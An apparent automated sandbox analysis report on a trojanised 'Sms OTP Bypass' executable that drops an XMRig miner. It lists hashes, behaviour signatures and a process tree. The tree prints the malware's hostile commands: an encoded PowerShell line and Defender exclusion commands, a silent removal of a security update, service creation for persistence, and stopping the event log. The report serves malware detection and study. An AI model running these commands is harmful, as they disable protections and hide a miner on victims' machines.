Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
11/03/2024, 19:01
General
-
Target
Sms OTP Bypass.exe
-
Size
7.0MB
-
MD5
4df295e5480362e75b85e46693da286f
-
SHA1
e791d85958043807505d6d515352884513d8d8dd
-
SHA256
39899e500bdfd7374f1e70fbfac44d6426e7b4eb4970c3ff49a3515f76e13728
-
SHA512
97e2add3ea23a8196eff5ed50bc08a4e50a48d2629c8f64afe19a0280adb947a2287735ecc4c32b59d7b1722a530120cf310fdecc4d89671843a3318128983f3
-
SSDEEP
196608:vPMf4f+QSvWLEesxAv12VI4yBj5w6C/1/pejflOy+:n4oRvLNsC1c8jKJejfd
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 9 IoCs
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 2 IoCs
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Sms OTP Bypass.exe"C:\Users\Admin\AppData\Local\Temp\Sms OTP Bypass.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAawBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAeQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYgBuACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\xax.exe"C:\Users\Admin\AppData\Local\Temp\xax.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "QKSKJKRJ"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "QKSKJKRJ" binpath= "C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe" start= "auto"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "QKSKJKRJ"3⤵
- Launches sc.exe
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exeC:\ProgramData\dxsbfkaweyrd\jjqyznjsierq.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
-
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.2MB
MD5339d06428da6646f3a82c2f83d78a1d1
SHA197adad7f8f098f350b747bc49899ffd1882d1fe2
SHA25665ad8d5f0c1416faeb76592fa79a78ea16e4e2e3e3b0cd4bbb66f70f27b2f525
SHA5121944be601e3cfad7b2a218c029d1043a8a3df4dc64fa62d9407bb0bbf67a5dcd33b541c7f698e846ee105905c8625886559247aeb4b3770161436fa30f82ecf1
-
Filesize
2.1MB
MD509580b30a73902b7e4d78d376c2590da
SHA13f4a113ba7229f97e825dda2b7f1387dff021cfa
SHA25657c2cb7fb9a946ae0e3c2a2bdad0deabe5f49b926eec3128b66b5403fcb67442
SHA5123426b37dadd5b40425824865f3eca308c283cb13c8468628b50f3c855fd4f2b567368f50bd47430afcd3e20f1df7f023d72bc067c2d13e2b113d516dbeb4768f
-
Filesize
18KB
MD56f917b81638859a0237a5c7efd5822dd
SHA1c5ac2b6f86b6ed8665a69a2deb0175f9b1723727
SHA256ff7b41bb04706ddb3394619200e11bba4e2318af9ac0bbbcf160d8294e027bde
SHA512f977b6885fd80e3ef07e689c2991c66a01d044ac1dbebf585e50e73530addc6e8de717d9171fa8520ed992ed4637ddd04c03de89c123d16c38ec9b86f6215aef
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD52b7e16b135c4e44b6f00d70f73fca100
SHA1cd633d7f72310b2ce1b44b000d5e7cb1cdf593d4
SHA256d8dea37f8bf774429f9f1a3e815ab1970c3642589c18a2683f4b6469755e07cb
SHA512590f01eaa1e9402a7da761a44f699ca535b204b777c329ae300777c7fb8476f52f8e71512699e13241376144a67d634bd194c174f577481f5bd75e9dc17c2dde
-
Filesize
652KB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
64KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
120KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
68KB
-
Filesize
56KB
-
Filesize
80KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
7.7MB
-
Filesize
64KB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
56KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
128KB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
8.3MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
24KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
40KB
-
Filesize
112KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
724KB
-
Filesize
112KB